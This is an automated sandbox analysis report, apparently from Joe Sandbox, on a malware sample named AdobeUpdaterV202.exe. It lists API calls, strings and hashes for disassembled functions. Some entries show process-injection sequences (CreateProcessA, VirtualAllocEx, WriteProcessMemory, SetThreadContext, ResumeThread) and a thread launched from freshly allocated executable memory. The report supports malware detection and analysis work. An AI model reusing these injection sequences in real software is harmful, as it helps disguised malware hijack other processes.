Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00EA4FAE

Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA4FE6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA5006

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
Instruction ID: fccb7507101f296c6a4d6a636527276f6ff1960b8d7486d5ce9c2838a1e76f99
Opcode Fuzzy Hash: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
Instruction Fuzzy Hash: FD11C4B66066157FAA2127765CCACBF6DECDF9F3947102424F502B9101EA64FE0045B1

Function 00EA93D5 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000), ref: 00EA93EC
GetLastError.KERNEL32(?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000,?,00EA0512,00000000), ref: 00EA93F8

Part of subcall function 00EA93BE: CloseHandle.KERNEL32(FFFFFFFE,00EA9408,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000), ref: 00EA93CE

___initconout.LIBCMT ref: 00EA9408

Part of subcall function 00EA9380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EA93AF,00EA81BE,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA9393

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA941D

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
Instruction ID: 205d96b35783901114113a6298e81ec997b869b9955be43ace55178f2a52dea1
Opcode Fuzzy Hash: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
Instruction Fuzzy Hash: 43F0303A401118BFCF221FA5DC049CD3F6BFF4E3A0F005010FA19A9171C632A921EB90

Function 00EA0BCD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0C1D
ReadFile.KERNEL32(?,?,00001000,?,00000000,00EA0966,00000001,00000000,00E931FD,00000000,?,?,00000000,?,?,00EA0DE9), ref: 00EA0CA3

Strings

f, xrefs: 00EA0BE6

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: f
API String ID: 1834446548-3647721633
Opcode ID: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
Instruction ID: 1f7687a8e49b74ca09466d5bac686fd3fa3f0823db06cc0705bb0b342e3bf1fe
Opcode Fuzzy Hash: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
Instruction Fuzzy Hash: 8241E072A00258AFCF25CF68CC80BE9B7B5AB4D314F1491E9E549BA141D7B1FE81DB50

Function 00E97F8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00E97FB2

Strings

MOC, xrefs: 00E97FC4
RCC, xrefs: 00E97FCC

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
Instruction ID: 6855c075d9a98adde1903ddad8be4f0de9cf324f9d42bb410bdaf18de300698e
Opcode Fuzzy Hash: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
Instruction Fuzzy Hash: 3641A972A00209AFDF26CF98CD85AEEBBB1FF49304F189059F904B7261D735A994CB50

Function 00E98922 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D,?,00E95C62), ref: 00E989A5
GetProcAddress.KERNEL32(00000000,?,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D), ref: 00E989AF

Strings

b\, xrefs: 00E98948

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: b\
API String ID: 3013587201-3493366257
Opcode ID: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
Instruction ID: 6808e52866b697250f53339f403fb3b5fead245f00947071f3569649fd7f0312
Opcode Fuzzy Hash: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
Instruction Fuzzy Hash: 1B11B135600115AFCF22CF64DD809B973A4FB8B3647142159EA0AF7220DF31ED01DB92

Analysis Process: AdobeUpdaterV202.exePID: 6888, Parent PID: 4004COMMON

Executed Functions

Function 007A018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 007A02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007A030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 007A032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 007A0351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 007A037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 007A03D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 007A041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 007A045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 007A0499
ResumeThread.KERNELBASE(?), ref: 007A04A8

Strings

Load, xrefs: 007A01CB
aryA, xrefs: 007A01D3
ress, xrefs: 007A0217
GetP, xrefs: 007A020F

Memory Dump Source

Source File: 00000014.00000002.2283598763.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7a0000_AdobeUpdaterV202.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 94d2544db2dcf14e7deb5fccae4f007d013abbd52beeb77c932c08cccaf34fe0
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 49B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94

Function 00E9EFA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,DFBDDF9F,?,00E9F0B5,?,?,00000000,00000000), ref: 00E9F069

Strings

api-ms-, xrefs: 00E9EFFF
ext-ms-, xrefs: 00E9F013

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
Instruction ID: 531a082dae165969a8cf78a3014fc92928714ced363a10a022ebe910df38e6f1
Opcode Fuzzy Hash: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
Instruction Fuzzy Hash: F4212731A01210ABCF219B21AC84A9E375CAF123B8F241130EA16FB3D2EB70FD01C6D0

Function 00EAC1F7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B

Part of subcall function 00EAC151: _Deallocate.LIBCONCRT ref: 00EAC1EC

CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00EAC23F
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252

Strings

ole, xrefs: 00EAC1FA
MZx, xrefs: 00EAC231

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
String ID: MZx$ole
API String ID: 440434604-1145851472
Opcode ID: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
Instruction ID: 1633923686453f40df89e3ac8e856e3ca609d198f55b319506146c2214cbcf21
Opcode Fuzzy Hash: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
Instruction Fuzzy Hash: 8EF0827620511C7FD15137639C89EBB3A6DDB8B7E5F520110FA06A55828A15380642B5

Function 00E9C0A9 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00E9C0A3,00000000,00E98CD2,?,?,DFBDDF9F,00E98CD2,?), ref: 00E9C0BA
TerminateProcess.KERNEL32(00000000,?,00E9C0A3,00000000,00E98CD2,?,?,DFBDDF9F,00E98CD2,?), ref: 00E9C0C1
ExitProcess.KERNEL32 ref: 00E9C0D3

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7caa8a29e93a9639033a1bd73f9491d313d61c46a3cc284cb5260588b34cbf47
Instruction ID: 44878a17598652e8df88adc4f280fbc9bb5504e7561fb5ff914db8be4462ab1a
Opcode Fuzzy Hash: 7caa8a29e93a9639033a1bd73f9491d313d61c46a3cc284cb5260588b34cbf47
Instruction Fuzzy Hash: 4ED09E71004504AFCF113F62ED4D9593F77AF45395F145010B90A6A432CF36ED579B44

Function 00E9F073 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa6722bbc991906530b4035533fa1b1177c508fed8724ee954fbf580649bb906
Instruction ID: a299e3028251d603d316f054dfa31129e2c782da87b48dd54c9655d9064c33d5
Opcode Fuzzy Hash: fa6722bbc991906530b4035533fa1b1177c508fed8724ee954fbf580649bb906
Instruction Fuzzy Hash: A501F533300215AFDF258E69EC4595A33EABBC53607649134F904EB195DE30D84197A0

Non-executed Functions

Function 00EA7596 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA762F
GetLocaleInfoW.KERNEL32(?,20001004,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA7658
GetACP.KERNEL32(?,?,00EA78B4,?,00000000), ref: 00EA766D

Strings

ACP, xrefs: 00EA75B4
OCP, xrefs: 00EA75EA

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
Instruction ID: 30ab302e0cea297d5704a862d9b9e0eefe54e235907f06efe18418c27819bece
Opcode Fuzzy Hash: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
Instruction Fuzzy Hash: 2B219521A08500AADB34CF19CD05BD773A7EF9AB98B569464E98AFF100E732FD41C350

Function 00EA776B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00E9EAF6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EA7877
IsValidCodePage.KERNEL32(00000000), ref: 00EA78C0
IsValidLocale.KERNEL32(?,00000001), ref: 00EA78CF
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EA7917
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EA7936

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
Instruction ID: d1066bc1f813f45b51d3cdaca275b2a85df5e28fdf8f1cf616956ad50ab9bf17
Opcode Fuzzy Hash: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
Instruction Fuzzy Hash: 8151AD71A04215AFEB14DFA5CC85ABE77B8BF0E300F145429E581FB150EB74A904CB60

Function 00EA6E07 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00E9EAF6

GetACP.KERNEL32(?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EA6EC8
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?), ref: 00EA6EF3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EA7056

Strings

utf8, xrefs: 00EA6FC5

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
Instruction ID: 8b6b53462f19656ba86964cd8b2b70a144c8888795098cdf0ccaecdc25c39e96
Opcode Fuzzy Hash: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
Instruction Fuzzy Hash: CC71C275700206AEDB24AF34DC46BAA77E8EF4F708F18642AF505FE581EB74F9408660

Function 00E94D66 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E94D72
IsDebuggerPresent.KERNEL32 ref: 00E94E3E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E94E57
UnhandledExceptionFilter.KERNEL32(?), ref: 00E94E61

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
Instruction ID: fcacecbf968194ebf7d998c59bc7e4a1899098b1fc839e5f45e7d303bf55459f
Opcode Fuzzy Hash: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
Instruction Fuzzy Hash: 993107B5D052189ADF21DF64D989BCDBBB8AF08300F1051AAE40DAB290E7719A858F44

Function 00EAC25D Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E910D0: __EH_prolog3_catch.LIBCMT ref: 00E910D7
Part of subcall function 00E910D0: _strlen.LIBCMT ref: 00E910E9

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00EAC285

Part of subcall function 00E9163E: _strlen.LIBCMT ref: 00E91656

_strlen.LIBCMT ref: 00EAC2A0
_strlen.LIBCMT ref: 00EAC2B6
GetProcAddress.KERNEL32(00000000,?), ref: 00EAC2D3

Part of subcall function 00EAC1F7: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B
Part of subcall function 00EAC1F7: CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00EAC23F
Part of subcall function 00EAC1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
Part of subcall function 00EAC1F7: CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252

Part of subcall function 00E91BEA: _Deallocate.LIBCONCRT ref: 00E91BF9

Strings

ole, xrefs: 00EAC2B0, 00EAC2B5, 00EAC2BD
Cons, xrefs: 00EAC29A, 00EAC29F, 00EAC2A7
Free, xrefs: 00EAC28B
kernel32.dll, xrefs: 00EAC280
Madino Mino, xrefs: 00EAC26F

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
String ID: Cons$Free$Madino Mino$kernel32.dll$ole
API String ID: 4115190924-2348686229
Opcode ID: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
Instruction ID: c3519cf0fd71efebbf88634c3a0ce197cdafabd5045aa524cd8769405ea26613
Opcode Fuzzy Hash: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
Instruction Fuzzy Hash: 0E018471E08209AEDF14EBA4DC46CFEB3F8EE9A710710105AF802B6191EE74B906D665

Function 00E97BE8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E97D07
___TypeMatch.LIBVCRUNTIME ref: 00E97E15
_UnwindNestedFrames.LIBCMT ref: 00E97F67
CallUnexpected.LIBVCRUNTIME ref: 00E97F82

Strings

csm, xrefs: 00E97D3E
csm, xrefs: 00E97C25
csm, xrefs: 00E97C92

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
Instruction ID: 762c12f6d874837080efa91a7247b2f99907319de97b1b78c8a6181717cfa205
Opcode Fuzzy Hash: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
Instruction Fuzzy Hash: EEB18A71928209EFCF29DFA4C8819AEBBB5BF04314F146059E8917B212D731EE59CB91

Function 00EA163C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00EA18B5

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
